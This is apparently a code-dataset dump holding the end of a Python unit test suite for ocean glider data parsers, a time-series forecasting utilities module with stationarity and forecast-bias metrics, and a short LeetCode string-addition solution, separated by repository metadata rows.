DostaRecoveredParticleKey.SCI_OXY4_SATURATION: 96.009}
record_2 = {DostaRecoveredParticleKey.SCI_OXY4_OXYGEN: 242.141,
DostaRecoveredParticleKey.SCI_OXY4_SATURATION: 95.988}
self.assert_generate_particle(DostaRecoveredDataParticle, record_1)
self.assert_generate_particle(DostaRecoveredDataParticle, record_2)
self.assert_no_more_data()
@attr('UNIT', group='mi')
class FLORTTelemeteredGliderTest(GliderParserUnitTestCase):
"""
Test cases for flort glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'FlortTelemeteredDataParticle'
}
def test_flort_telemetered_particle(self):
"""
Verify the parser publishes the expected particles from the test data.
"""
self.set_data(HEADER3, FLORT_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {FlortTelemeteredParticleKey.SCI_FLBBCD_BB_UNITS: 0.000281336,
FlortTelemeteredParticleKey.SCI_FLBBCD_CDOM_UNITS: 2.0352,
FlortTelemeteredParticleKey.SCI_FLBBCD_CHLOR_UNITS: 0.8349}
record_2 = {FlortTelemeteredParticleKey.SCI_FLBBCD_BB_UNITS: 0.000262988,
FlortTelemeteredParticleKey.SCI_FLBBCD_CDOM_UNITS: 2.12,
FlortTelemeteredParticleKey.SCI_FLBBCD_CHLOR_UNITS: 0.847}
self.assert_generate_particle(FlortTelemeteredDataParticle, record_1)
self.assert_generate_particle(FlortTelemeteredDataParticle, record_2)
self.assert_no_more_data()
def test_multiple_yml(self):
"""
Test with a yml file with multiple records
"""
with open(os.path.join(FLORT_M_RESOURCE_PATH, 'multiple_glider_record.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
record = parser.get_records(4)
self.assert_particles(record, 'multiple_flort_record.mrg.result.yml', FLORT_M_RESOURCE_PATH)
self.assertEqual(self.exception_callback_value, [])
@attr('UNIT', group='mi')
class FLORTRecoveredGliderTest(GliderParserUnitTestCase):
"""
Test cases for recovered flort glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'FlortRecoveredDataParticle'
}
def test_flort_recovered_particle(self):
"""
Verify the parser publishes the expected particles from the test data.
"""
self.set_data(HEADER3, FLORT_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {FlortRecoveredParticleKey.SCI_FLBBCD_BB_UNITS: 0.000281336,
FlortRecoveredParticleKey.SCI_FLBBCD_CDOM_UNITS: 2.0352,
FlortRecoveredParticleKey.SCI_FLBBCD_CHLOR_UNITS: 0.8349}
record_2 = {FlortRecoveredParticleKey.SCI_FLBBCD_BB_UNITS: 0.000262988,
FlortRecoveredParticleKey.SCI_FLBBCD_CDOM_UNITS: 2.12,
FlortRecoveredParticleKey.SCI_FLBBCD_CHLOR_UNITS: 0.847}
self.assert_generate_particle(FlortRecoveredDataParticle, record_1)
self.assert_generate_particle(FlortRecoveredDataParticle, record_2)
self.assert_no_more_data()
@attr('UNIT', group='mi')
class FlortOTelemeteredGliderTest(GliderParserUnitTestCase):
"""
Test cases for FLORT-O glider data.
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'FlortODataParticle'
}
def test_flort_o_telemetered_particle(self):
"""
Verify the parser publishes the expected particles from the test data.
"""
self.set_data(HEADER6, FLORT_O_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {FlortODataParticleKey.SCI_BB3SLO_B470_SIG: 70,
FlortODataParticleKey.SCI_BB3SLO_B532_SIG: 101,
FlortODataParticleKey.SCI_BB3SLO_B660_SIG: 169}
record_2 = {FlortODataParticleKey.SCI_BB3SLO_B470_SIG: 148,
FlortODataParticleKey.SCI_BB3SLO_B532_SIG: 217,
FlortODataParticleKey.SCI_BB3SLO_B660_SIG: 4047}
self.assert_generate_particle(FlortODataParticle, record_1)
self.assert_generate_particle(FlortODataParticle, record_2)
self.assert_no_more_data()
def test_merged_data(self):
"""
Test with a FLORT-O merged telemetered data file.
"""
with open(os.path.join(FLORT_O_RESOURCE_PATH, 'merged_flort_o_telemetered_data.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
record = parser.get_records(5)
self.assert_particles(record, 'merged_flort_o_telemetered_data.mrg.result.yml', FLORT_O_RESOURCE_PATH)
self.assertEqual(self.exception_callback_value, [])
@attr('UNIT', group='mi')
class FlortORecoveredGliderTest(GliderParserUnitTestCase):
"""
Test cases for recovered FLORT-O glider data.
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'FlortODataParticle'
}
def test_flort_o_recovered_particle(self):
"""
Verify the parser publishes the expected particles from the test data.
"""
self.set_data(HEADER6, FLORT_O_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {FlortODataParticleKey.SCI_BB3SLO_B470_SIG: 70,
FlortODataParticleKey.SCI_BB3SLO_B532_SIG: 101,
FlortODataParticleKey.SCI_BB3SLO_B660_SIG: 169}
record_2 = {FlortODataParticleKey.SCI_BB3SLO_B470_SIG: 148,
FlortODataParticleKey.SCI_BB3SLO_B532_SIG: 217,
FlortODataParticleKey.SCI_BB3SLO_B660_SIG: 4047}
self.assert_generate_particle(FlortODataParticle, record_1)
self.assert_generate_particle(FlortODataParticle, record_2)
self.assert_no_more_data()
def test_merged_data(self):
"""
Test with a FLORT-O merged recovered data file.
"""
with open(os.path.join(FLORT_O_RESOURCE_PATH, 'merged_flort_o_recovered_data.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
record = parser.get_records(5)
self.assert_particles(record, 'merged_flort_o_recovered_data.mrg.result.yml', FLORT_O_RESOURCE_PATH)
self.assertEquals(self.exception_callback_value, [])
@attr('UNIT', group='mi')
class PARADTelemeteredGliderTest(GliderParserUnitTestCase):
"""
Test cases for parad glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'ParadTelemeteredDataParticle'
}
def test_parad_telemetered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
# reused the FLORT record data for this Parad test
self.set_data(HEADER3, FLORT_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {ParadTelemeteredParticleKey.SCI_BSIPAR_PAR: 664.424}
record_2 = {ParadTelemeteredParticleKey.SCI_BSIPAR_PAR: 645.569}
        # verify both expected PAR records are generated
        self.assert_generate_particle(ParadTelemeteredDataParticle, record_1)
        self.assert_generate_particle(ParadTelemeteredDataParticle, record_2)
self.assert_no_more_data()
def test_multiple_yml(self):
"""
Test with a yml file with multiple records
"""
with open(os.path.join(PARAD_RESOURCE_PATH, 'multiple_glider_record.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
record = parser.get_records(4)
self.assert_particles(record, 'multiple_parad_record.mrg.result.yml', PARAD_RESOURCE_PATH)
self.assertEquals(self.exception_callback_value, [])
@attr('UNIT', group='mi')
class PARADRecoveredGliderTest(GliderParserUnitTestCase):
"""
Test cases for recovered parad glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'ParadRecoveredDataParticle'
}
def test_parad_recovered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
# reused the FLORT record data for this Parad test
self.set_data(HEADER3, FLORT_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {ParadRecoveredParticleKey.SCI_BSIPAR_PAR: 664.424}
record_2 = {ParadRecoveredParticleKey.SCI_BSIPAR_PAR: 645.569}
        # verify both expected PAR records are generated
        self.assert_generate_particle(ParadRecoveredDataParticle, record_1)
        self.assert_generate_particle(ParadRecoveredDataParticle, record_2)
self.assert_no_more_data()
@attr('UNIT', group='mi')
class FLORDTelemeteredGliderTest(GliderParserUnitTestCase):
"""
Test cases for flord glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'FlordTelemeteredDataParticle'
}
def test_flord_telemetered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
# reused the FLORT record data for this Flord test
self.set_data(HEADER5, FLORD_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {FlordParticleKey.SCI_FLBB_BB_UNITS: 0.000281, FlordParticleKey.SCI_FLBB_CHLOR_UNITS: 0.8349}
record_2 = {FlordParticleKey.SCI_FLBB_BB_UNITS: 0.000263, FlordParticleKey.SCI_FLBB_CHLOR_UNITS: 0.847}
self.assert_generate_particle(FlordTelemeteredDataParticle, record_1)
self.assert_generate_particle(FlordTelemeteredDataParticle, record_2)
self.assert_no_more_data()
def test_multiple_yml(self):
"""
Test with a yml file with multiple records
"""
with open(os.path.join(FLORD_M_RESOURCE_PATH, 'multiple_flord_record.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
record = parser.get_records(4)
self.assert_particles(record, 'multiple_flord_record.mrg.result.yml', FLORD_M_RESOURCE_PATH)
self.assertEquals(self.exception_callback_value, [])
def test_real(self):
"""
Test with a real file and confirm no exceptions occur
"""
with open(os.path.join(FLORD_M_RESOURCE_PATH, 'unit_363_2013_245_6_6.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(240)
self.assert_(len(records) > 0)
self.assertEquals(self.exception_callback_value, [])
@attr('UNIT', group='mi')
class FLORDRecoveredGliderTest(GliderParserUnitTestCase):
"""
Test cases for flord glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'FlordRecoveredDataParticle'
}
def test_flord_recovered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
# reused the FLORT record data for this Flord test
self.set_data(HEADER5, FLORD_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {FlordParticleKey.SCI_FLBB_BB_UNITS: 0.000281, FlordParticleKey.SCI_FLBB_CHLOR_UNITS: 0.8349}
record_2 = {FlordParticleKey.SCI_FLBB_BB_UNITS: 0.000263, FlordParticleKey.SCI_FLBB_CHLOR_UNITS: 0.847}
self.assert_generate_particle(FlordRecoveredDataParticle, record_1)
self.assert_generate_particle(FlordRecoveredDataParticle, record_2)
self.assert_no_more_data()
@attr('UNIT', group='mi')
class ENGGliderTest(GliderParserUnitTestCase):
"""
Test cases for eng glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
EngineeringClassKey.METADATA: 'EngineeringMetadataDataParticle',
EngineeringClassKey.DATA: 'EngineeringTelemeteredDataParticle',
EngineeringClassKey.SCIENCE: 'EngineeringScienceTelemeteredDataParticle',
EngineeringClassKey.GPS: 'GpsPositionDataParticle'
}
}
def test_eng_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
self.set_data(HEADER4, ENGSCI_RECORD)
self.parser = GliderEngineeringParser(self.config, self.test_data, self.exception_callback)
meta_record = {EngineeringMetadataParticleKey.GLIDER_ENG_FILENAME: 'unit_247-2012-051-0-0-dbd(01840000)',
EngineeringMetadataParticleKey.GLIDER_MISSION_NAME: 'ENDUR1.MI',
EngineeringMetadataParticleKey.GLIDER_ENG_FILEOPEN_TIME: 'Tue_Feb_21_18:39:39_2012'}
record_1 = {EngineeringTelemeteredParticleKey.M_BATTPOS: 0.703717,
EngineeringTelemeteredParticleKey.M_HEADING: 5.05447}
record_2 = {EngineeringTelemeteredParticleKey.M_BATTPOS: 0.695632,
EngineeringTelemeteredParticleKey.M_HEADING: 5.05447}
record_sci_1 = {EngineeringScienceTelemeteredParticleKey.SCI_M_DISK_FREE: 1000.1,
EngineeringScienceTelemeteredParticleKey.SCI_M_DISK_USAGE: 1000.1}
record_sci_2 = {EngineeringScienceTelemeteredParticleKey.SCI_M_DISK_FREE: 1000.2,
EngineeringScienceTelemeteredParticleKey.SCI_M_DISK_USAGE: 1000.2}
record_gps_1 = {GpsPositionParticleKey.M_GPS_LAT: 43.47113833333333,
GpsPositionParticleKey.M_GPS_LON: -125.39660833333333}
record_gps_2 = {GpsPositionParticleKey.M_GPS_LAT: 43.47113833333333,
GpsPositionParticleKey.M_GPS_LON: -125.39660833333333}
self.assert_generate_particle(EngineeringMetadataDataParticle, meta_record)
# 1 sample line generates 3 particles
self.assert_generate_particle(EngineeringTelemeteredDataParticle, record_1)
self.assert_generate_particle(GpsPositionDataParticle, record_gps_1)
self.assert_generate_particle(EngineeringScienceTelemeteredDataParticle, record_sci_1)
self.assert_generate_particle(EngineeringTelemeteredDataParticle, record_2)
self.assert_generate_particle(GpsPositionDataParticle, record_gps_2)
self.assert_generate_particle(EngineeringScienceTelemeteredDataParticle, record_sci_2)
self.assert_no_more_data()
def test_encode_lat(self):
"""
Test that encoding a latitude value that doesn't match the regex produces an encoding exception
"""
self.set_data(HEADER4, ENGSCI_BAD_LAT_RECORD)
self.parser = GliderEngineeringParser(self.config, self.test_data, self.exception_callback)
record_1 = {EngineeringTelemeteredParticleKey.M_BATTPOS: 0.703717,
EngineeringTelemeteredParticleKey.M_HEADING: 5.05447,
EngineeringTelemeteredParticleKey.C_WPT_LAT: None,
EngineeringTelemeteredParticleKey.C_WPT_LON: -126.0}
record_2 = {EngineeringTelemeteredParticleKey.M_BATTPOS: 0.695632,
EngineeringTelemeteredParticleKey.M_HEADING: 5.05447,
EngineeringTelemeteredParticleKey.C_WPT_LAT: 0.5,
EngineeringTelemeteredParticleKey.C_WPT_LON: -126.0}
# just check the data records, the other particle classes were checked above
self.assert_generate_particle(EngineeringMetadataDataParticle)
self.assert_generate_particle(EngineeringTelemeteredDataParticle, record_1)
self.assert_generate_particle(GpsPositionDataParticle)
self.assert_generate_particle(EngineeringScienceTelemeteredDataParticle)
self.assert_generate_particle(EngineeringTelemeteredDataParticle, record_2)
self.assert_generate_particle(GpsPositionDataParticle)
self.assert_generate_particle(EngineeringScienceTelemeteredDataParticle)
self.assert_no_more_data()
def test_bad_config(self):
"""
Test that a bad config causes an exception
"""
# bad metadata class, this one does not exist
bad_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
EngineeringClassKey.METADATA: 'EngineeringDataParticle',
EngineeringClassKey.DATA: 'EngineeringTelemeteredDataParticle',
EngineeringClassKey.SCIENCE: 'EngineeringScienceTelemeteredDataParticle'
}
}
self.set_data(HEADER4, ENGSCI_RECORD)
with self.assertRaises(ConfigurationException):
self.parser = GliderEngineeringParser(bad_config, self.test_data, self.exception_callback)
# no config
with self.assertRaises(ConfigurationException):
self.parser = GliderEngineeringParser({}, self.test_data, self.exception_callback)
# no particle classes dict in config
bad_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
}
with self.assertRaises(ConfigurationException):
self.parser = GliderEngineeringParser(bad_config, self.test_data, self.exception_callback)
@attr('UNIT', group='mi')
class ENGRecoveredGliderTest(GliderParserUnitTestCase):
"""
Test cases for recovered eng glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
EngineeringClassKey.METADATA: 'EngineeringMetadataRecoveredDataParticle',
EngineeringClassKey.DATA: 'EngineeringRecoveredDataParticle',
EngineeringClassKey.SCIENCE: 'EngineeringScienceRecoveredDataParticle',
EngineeringClassKey.GPS: 'GpsPositionDataParticle'
}
}
def test_eng_recovered_particle(self):
"""
Verify we publish particles as expected. Ensure particle is published and
that state is returned.
"""
self.set_data(HEADER4, ENGSCI_RECORD)
self.parser = GliderEngineeringParser(self.config, self.test_data, self.exception_callback)
meta_record = {EngineeringMetadataParticleKey.GLIDER_ENG_FILENAME: 'unit_247-2012-051-0-0-dbd(01840000)',
EngineeringMetadataParticleKey.GLIDER_MISSION_NAME: 'ENDUR1.MI',
EngineeringMetadataParticleKey.GLIDER_ENG_FILEOPEN_TIME: 'Tue_Feb_21_18:39:39_2012'}
record_1 = {EngineeringRecoveredParticleKey.M_BATTPOS: 0.703717,
EngineeringRecoveredParticleKey.M_HEADING: 5.05447}
record_2 = {EngineeringRecoveredParticleKey.M_BATTPOS: 0.695632,
EngineeringRecoveredParticleKey.M_HEADING: 5.05447}
record_sci_1 = {EngineeringScienceRecoveredParticleKey.SCI_M_DISK_FREE: 1000.1,
EngineeringScienceRecoveredParticleKey.SCI_M_DISK_USAGE: 1000.1}
record_sci_2 = {EngineeringScienceRecoveredParticleKey.SCI_M_DISK_FREE: 1000.2,
EngineeringScienceRecoveredParticleKey.SCI_M_DISK_USAGE: 1000.2}
record_gps_1 = {GpsPositionParticleKey.M_GPS_LAT: 43.47113833333333,
GpsPositionParticleKey.M_GPS_LON: -125.39660833333333}
record_gps_2 = {GpsPositionParticleKey.M_GPS_LAT: 43.47113833333333,
GpsPositionParticleKey.M_GPS_LON: -125.39660833333333}
self.assert_generate_particle(EngineeringMetadataRecoveredDataParticle, meta_record)
# 1 sample line generates 3 particles
self.assert_generate_particle(EngineeringRecoveredDataParticle, record_1)
self.assert_generate_particle(GpsPositionDataParticle, record_gps_1)
self.assert_generate_particle(EngineeringScienceRecoveredDataParticle, record_sci_1)
self.assert_generate_particle(EngineeringRecoveredDataParticle, record_2)
self.assert_generate_particle(GpsPositionDataParticle, record_gps_2)
self.assert_generate_particle(EngineeringScienceRecoveredDataParticle, record_sci_2)
self.assert_no_more_data()
def test_multiple_yml(self):
"""
Test with a yml file with multiple records
"""
with open(os.path.join(ENG_RESOURCE_PATH, 'multiple_glider_record-engDataOnly.mrg'), 'rU') as file_handle:
parser = GliderEngineeringParser(self.config, file_handle, self.exception_callback)
particles = parser.get_records(13)
self.assert_particles(particles, 'multiple_glider_record_recovered-engDataOnly.mrg.result.yml',
ENG_RESOURCE_PATH)
self.assertEquals(self.exception_callback_value, [])
def test_real(self):
"""
Test a real file and confirm no exceptions occur
"""
with open(os.path.join(ENG_RESOURCE_PATH, 'unit_363_2013_245_6_6.mrg'), 'rU') as file_handle:
parser = GliderEngineeringParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(240)
self.assert_(len(records) > 3)
self.assertEquals(self.exception_callback_value, [])
def test_ingest_errors(self):
"""
Test handling of inf fill values in a real file
"""
with open(os.path.join(ENG_RESOURCE_PATH, 'cp_388_2014_280_0_245.full.mrg'), 'rU') as file_handle:
parser = GliderEngineeringParser(self.config, file_handle, self.exception_callback)
particles = parser.get_records(32000)
            # generate each particle's dictionary to exercise encoding of the fill values
            for particle in particles:
                particle.generate_dict()
self.assertEquals(self.exception_callback_value, [])
def test_for_69_file(self):
"""
Test a real file and confirm no exceptions occur with file containing 69696969 fill values
"""
with open(os.path.join(ENG_RESOURCE_PATH, 'cp_388_2016_012_0_0.mrg'), 'rU') as file_handle:
parser = GliderEngineeringParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(2000)
self.assert_(len(records) > 3)
self.assertEquals(self.exception_callback_value, [])
def test_69_values(self):
"""
Test that encoding a value of 69696969 results in param values of None
"""
record_gps_1 = {GpsPositionParticleKey.M_GPS_LAT: None,
GpsPositionParticleKey.M_GPS_LON: None}
record_gps_2 = {GpsPositionParticleKey.M_GPS_LAT: None,
GpsPositionParticleKey.M_GPS_LON: None}
self.set_data(HEADER4, ENGSCI_RECORD_69)
self.parser = GliderEngineeringParser(self.config, self.test_data, self.exception_callback)
# just check the data records, the other particle classes were checked above
self.assert_generate_particle(EngineeringMetadataRecoveredDataParticle)
self.assert_generate_particle(EngineeringRecoveredDataParticle)
self.assert_generate_particle(GpsPositionDataParticle, record_gps_1)
self.assert_generate_particle(EngineeringScienceRecoveredDataParticle)
self.assert_generate_particle(EngineeringRecoveredDataParticle)
self.assert_generate_particle(GpsPositionDataParticle, record_gps_2)
self.assert_generate_particle(EngineeringScienceRecoveredDataParticle)
self.assert_no_more_data()
def test_for_nan_NaN(self):
"""
Test a real file and confirm no exceptions occur when nan is used instead of NaN
"""
with open(os.path.join(ENG_RESOURCE_PATH, 'cp_388_2016_012_1_0.mrg'), 'rU') as file_handle:
parser = GliderEngineeringParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(2000)
self.assert_(len(records) > 3)
self.assertEquals(self.exception_callback_value, [])
| 87.48766 | 6,480 | 0.768248 |
a3dc9f62bbc97d1482035de5b44417efbe36d86a | 7,746 | py | Python | src/utils/ts_utils.py | PacktPublishing/Modern-Time-Series-Forecasting-with-Python- | 391ae9c8c8c5b2fba20a8ada8e48e68eb46f118a | ["MIT"] | 10 | 2021-08-09T11:06:28.000Z | 2022-03-07T14:47:36.000Z | src/utils/ts_utils.py | PacktPublishing/Modern-Time-Series-Forecasting-with-Python- | 391ae9c8c8c5b2fba20a8ada8e48e68eb46f118a | ["MIT"] | null | null | null | src/utils/ts_utils.py | PacktPublishing/Modern-Time-Series-Forecasting-with-Python- | 391ae9c8c8c5b2fba20a8ada8e48e68eb46f118a | ["MIT"] | null | null | null |
import numpy as np
from functools import partial
from src.decomposition.seasonal import _detrend
def make_stationary(x: np.ndarray, method: str = "detrend", detrend_kwargs: dict = None):
    """Utility to make a time series stationary
    Args:
        x (np.ndarray): The time series array to be made stationary
        method (str, optional): {"detrend","logdiff"}. Defaults to "detrend".
        detrend_kwargs (dict, optional): These kwargs will be passed on to the detrend method
    Returns:
        The stationary series and a callable that inverts the transformation
    """
    # avoid a mutable default argument, which would be shared across calls
    if detrend_kwargs is None:
        detrend_kwargs = {}
    if method == "detrend":
        detrend_kwargs["return_trend"] = True
        stationary, trend = _detrend(x, **detrend_kwargs)
def inverse_transform(st, trend):
return st+trend
return stationary, partial(inverse_transform, trend=trend)
elif method == "logdiff":
stationary = np.log(x[:-1]/x[1:])
def inverse_transform(st, x):
_x = np.exp(st)
return _x*x[1:]
        return stationary, partial(inverse_transform, x=x)
    else:
        raise ValueError(f"Unknown method '{method}'; use 'detrend' or 'logdiff'")
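# Illustrative usage (a sketch; assumes _detrend returns x minus the fitted trend):
#   series = np.arange(100, dtype=float) + np.random.rand(100)
#   stationary, inverse = make_stationary(series, method="detrend")
#   restored = inverse(stationary)  # adds the fitted trend back
#   np.allclose(restored, series)   # -> True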
from darts import TimeSeries
from darts.metrics.metrics import _get_values_or_raise, _remove_nan_union
from darts.metrics import metrics as dart_metrics
from typing import Optional, Union, Sequence, Callable
from src.utils.data_utils import is_datetime_dtypes
import pandas as pd
def forecast_bias(actual_series: Union[TimeSeries, Sequence[TimeSeries], np.ndarray],
pred_series: Union[TimeSeries, Sequence[TimeSeries], np.ndarray],
intersect: bool = True,
*,
reduction: Callable[[np.ndarray], float] = np.mean,
inter_reduction: Callable[[np.ndarray], Union[float, np.ndarray]] = lambda x: x,
n_jobs: int = 1,
verbose: bool = False) -> Union[float, np.ndarray]:
""" Forecast Bias (FB).
Given a time series of actual values :math:`y_t` and a time series of predicted values :math:`\\hat{y}_t`
both of length :math:`T`, it is a percentage value computed as
.. math:: 100 \\cdot \\frac{\\sum_{t=1}^{T}{y_t}
- \\sum_{t=1}^{T}{\\hat{y}_t}}{\\sum_{t=1}^{T}{y_t}}.
If any of the series is stochastic (containing several samples), the median sample value is considered.
Parameters
----------
actual_series
The `TimeSeries` or `Sequence[TimeSeries]` of actual values.
pred_series
The `TimeSeries` or `Sequence[TimeSeries]` of predicted values.
intersect
For time series that are overlapping in time without having the same time index, setting `intersect=True`
will consider the values only over their common time interval (intersection in time).
reduction
Function taking as input a `np.ndarray` and returning a scalar value. This function is used to aggregate
the metrics of different components in case of multivariate `TimeSeries` instances.
inter_reduction
Function taking as input a `np.ndarray` and returning either a scalar value or a `np.ndarray`.
This function can be used to aggregate the metrics of different series in case the metric is evaluated on a
`Sequence[TimeSeries]`. Defaults to the identity function, which returns the pairwise metrics for each pair
of `TimeSeries` received in input. Example: `inter_reduction=np.mean`, will return the average of the pairwise
metrics.
n_jobs
The number of jobs to run in parallel. Parallel jobs are created only when a `Sequence[TimeSeries]` is
passed as input, parallelising operations regarding different `TimeSeries`. Defaults to `1`
(sequential). Setting the parameter to `-1` means using all the available processors.
verbose
Optionally, whether to print operations progress
Raises
------
ValueError
If :math:`\\sum_{t=1}^{T}{y_t} = 0`.
Returns
-------
float
The Forecast Bias (FB)
"""
assert type(actual_series) is type(pred_series), "actual_series and pred_series should be of same type."
if isinstance(actual_series, np.ndarray):
y_true, y_pred = actual_series, pred_series
else:
y_true, y_pred = _get_values_or_raise(actual_series, pred_series, intersect)
y_true, y_pred = _remove_nan_union(y_true, y_pred)
y_true_sum, y_pred_sum = np.sum(y_true), np.sum(y_pred)
# raise_if_not(y_true_sum > 0, 'The series of actual value cannot sum to zero when computing OPE.', logger)
return ((y_true_sum - y_pred_sum) / y_true_sum) * 100.
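# Quick sanity check (illustrative): the actuals sum to 60 and the predictions
# to 57, so the forecast bias is +5% (an under-forecast):
#   forecast_bias(np.array([10., 20., 30.]), np.array([9., 19., 29.]))  # -> 5.0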
def darts_metrics_adapter(metric_func, actual_series: Union[TimeSeries, Sequence[TimeSeries]],
pred_series: Union[TimeSeries, Sequence[TimeSeries]],
insample: Union[TimeSeries, Sequence[TimeSeries]] = None,
m: Optional[int] = 1,
intersect: bool = True,
reduction: Callable[[np.ndarray], float] = np.mean,
inter_reduction: Callable[[np.ndarray], Union[float, np.ndarray]] = lambda x: x,
n_jobs: int = 1,
verbose: bool = False):
is_pd_dataframe = isinstance(actual_series, pd.DataFrame)
if is_pd_dataframe:
if actual_series.shape[1]==1:
actual_series = actual_series.squeeze()
pred_series = pred_series.squeeze()
if insample is not None:
insample = insample.squeeze()
        else:
            raise ValueError("Dataframes with more than one column are not supported in the adapter. Use either a Series with a datetime index, a dataframe with a single column and a datetime index, or numpy arrays")
assert type(actual_series) is type(pred_series), f"actual_series({type(actual_series)}) and pred_series({type(pred_series)}) should be of same type."
if insample is not None:
assert type(actual_series) is type(insample), "actual_series and insample should be of same type."
is_nd_array = isinstance(actual_series, np.ndarray)
is_pd_series = isinstance(actual_series, pd.Series)
if is_pd_series:
is_datetime_index = is_datetime_dtypes(actual_series.index) and is_datetime_dtypes(pred_series.index)
if insample is not None:
is_datetime_index = is_datetime_index and is_datetime_dtypes(insample.index)
else:
is_datetime_index = False
if metric_func.__name__ == "mase":
if not is_datetime_index:
raise ValueError("MASE needs pandas Series with datetime index as inputs")
if is_nd_array or (is_pd_series and not is_datetime_index):
actual_series, pred_series = TimeSeries.from_values(actual_series.values if is_pd_series else actual_series), TimeSeries.from_values(pred_series.values if is_pd_series else pred_series)
if insample is not None:
insample = TimeSeries.from_values(insample.values if is_pd_series else insample)
elif is_pd_series and is_datetime_index:
actual_series, pred_series = TimeSeries.from_series(actual_series), TimeSeries.from_series(pred_series)
if insample is not None:
insample = TimeSeries.from_series(insample)
else:
        raise ValueError("Unsupported input type. Use a Series with a datetime index, a dataframe with a single column and a datetime index, or numpy arrays")
if metric_func.__name__ == "mase":
return metric_func(actual_series=actual_series, pred_series=pred_series, insample=insample, m=m, intersect=intersect, reduction=reduction, inter_reduction=inter_reduction, n_jobs=n_jobs, verbose=verbose)
else:
return metric_func(actual_series=actual_series, pred_series=pred_series, intersect=intersect, reduction=reduction, inter_reduction=inter_reduction, n_jobs=n_jobs, verbose=verbose)
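# Illustrative usage with darts' mape (a sketch; the adapter converts pandas
# inputs with a datetime index to darts TimeSeries before delegating):
#   idx = pd.date_range("2021-01-01", periods=3, freq="D")
#   actual = pd.Series([10., 20., 30.], index=idx)
#   pred = pd.Series([9., 19., 29.], index=idx)
#   darts_metrics_adapter(dart_metrics.mape, actual, pred)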
def mae(actuals, predictions):
return np.nanmean(np.abs(actuals-predictions))
def mse(actuals, predictions):
return np.nanmean(np.power(actuals-predictions, 2))
def forecast_bias_aggregate(actuals, predictions):
return (np.nansum(predictions)-np.nansum(actuals))/np.nansum(actuals)
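# Note that forecast_bias_aggregate returns a fraction with the opposite sign
# convention to forecast_bias above (negative here means under-forecasting):
#   forecast_bias_aggregate(np.array([10., 20., 30.]), np.array([9., 19., 29.]))  # -> -0.05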
| 49.974194 | 211 | 0.700878 |
3f15549f6cf9e0e54483db709e920bbf00009aa4 | 438 | py | Python | brain_training/programming_challenges/leetcode/easy/T415_Add_Strings.py | kuzxnia/algoritms | eda3185f39d79a2657b7ef0da869fcc6b825889d | ["MIT"] | null | null | null | brain_training/programming_challenges/leetcode/easy/T415_Add_Strings.py | kuzxnia/algoritms | eda3185f39d79a2657b7ef0da869fcc6b825889d | ["MIT"] | null | null | null | brain_training/programming_challenges/leetcode/easy/T415_Add_Strings.py | kuzxnia/algoritms | eda3185f39d79a2657b7ef0da869fcc6b825889d | ["MIT"] | null | null | null |
class Solution:
def addStrings(self, num1, num2):
if len(num1) == 0:
return num2
if len(num2) == 0:
return num1
digit_sum = int(num1[-1]) + int(num2[-1])
if digit_sum > 9:
return self.addStrings(self.addStrings(num1[:-1], str(digit_sum // 10)), num2[:-1]) + str(digit_sum % 10)
else:
return self.addStrings(num1[:-1], num2[:-1]) + str(digit_sum)
